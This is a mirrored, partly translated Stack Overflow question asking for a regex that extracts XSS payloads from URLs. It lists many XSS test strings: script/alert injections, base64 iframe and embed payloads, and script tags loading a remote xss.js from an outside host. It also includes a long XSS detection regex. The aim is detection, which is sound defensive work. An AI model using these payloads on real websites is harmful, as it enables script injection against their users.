堆棧內存溢出
  簡體   English   中英

正則表達式以匹配以下列表中的所有XSS負載

[英]Regex to match all XSS payloads in the following list

 原文  2017-09-26 15:47:21       python/ regex/ python-2.7/ payload

問題描述

我需要一個正則表達式來匹配以下列表中的所有XSS負載(我不是在嘗試過濾XSS請求並將URL保存為安全,而是在嘗試從URL本身提取負載並將其保存到變量中以后使用): 

http://www.example.com/subcat.php?id=24\x3c
http://www.example.com/subcat.php?id=24\x3C
http://www.example.com/subcat.php?id=24\u003c
http://www.example.com/subcat.php?id=24\u003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24%3C
http://www.example.com/subcat.php?id=24&lt
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&LT
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#60
http://www.example.com/subcat.php?id=24&#060
http://www.example.com/subcat.php?id=24&#0060
http://www.example.com/subcat.php?id=24&#00060
http://www.example.com/subcat.php?id=24&#000060
http://www.example.com/subcat.php?id=24&#0000060
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3c
http://www.example.com/subcat.php?id=24&#x03c
http://www.example.com/subcat.php?id=24&#x003c
http://www.example.com/subcat.php?id=24&#x0003c
http://www.example.com/subcat.php?id=24&#x00003c
http://www.example.com/subcat.php?id=24&#x000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3c
http://www.example.com/subcat.php?id=24&#X03c
http://www.example.com/subcat.php?id=24&#X003c
http://www.example.com/subcat.php?id=24&#X0003c
http://www.example.com/subcat.php?id=24&#X00003c
http://www.example.com/subcat.php?id=24&#X000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3C
http://www.example.com/subcat.php?id=24&#x03C
http://www.example.com/subcat.php?id=24&#x003C
http://www.example.com/subcat.php?id=24&#x0003C
http://www.example.com/subcat.php?id=24&#x00003C
http://www.example.com/subcat.php?id=24&#x000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3C
http://www.example.com/subcat.php?id=24&#X03C
http://www.example.com/subcat.php?id=24&#X003C
http://www.example.com/subcat.php?id=24&#X0003C
http://www.example.com/subcat.php?id=24&#X00003C
http://www.example.com/subcat.php?id=24&#X000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<script>alert(123)</script>
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script>
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss")
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');">
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)>
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT>
.... (for all see the URL)

我確實設法找到了一個,並對其進行編輯以匹配一些(但不是全部): 

<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=

有關示例,請參見此處 ,它將僅匹配具有<script>而其中一些不會對它們進行完全匹配。 是否有人擁有僅與URL的XSS有效負載匹配的更好的正則表達式,還是找到XSS有效負載的更好方法? 提前謝謝你。

1 個解決方案

解決方案1
 0  2017-09-26 18:58:52

想出了一種使用內置庫輕松執行此操作的方法: 

import urlparse

def find_xss_script(url, query=4):
    data = urlparse.urlparse(url)
    return data[query]

將返回類似: id=24&#x000003c;

暫無
暫無

聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

相關問題 正則表達式以匹配以下模式 正則表達式匹配不以@開頭的python列表中的所有單詞 創建正則表達式以匹配以下場景 如何匹配以下正則表達式python? python regex如何匹配以下內容? 如何在python中使用正則表達式匹配以下內容? 使用正則表達式或任何其他方式匹配字符串中列表的所有單詞 正則表達式匹配所有注釋 //, /* */ 正則表達式全部用定界符匹配 如果有正則表達式匹配,追加到列表
相關標簽
 
粵ICP備18138465號  © 2020-2024 STACKOOM.COM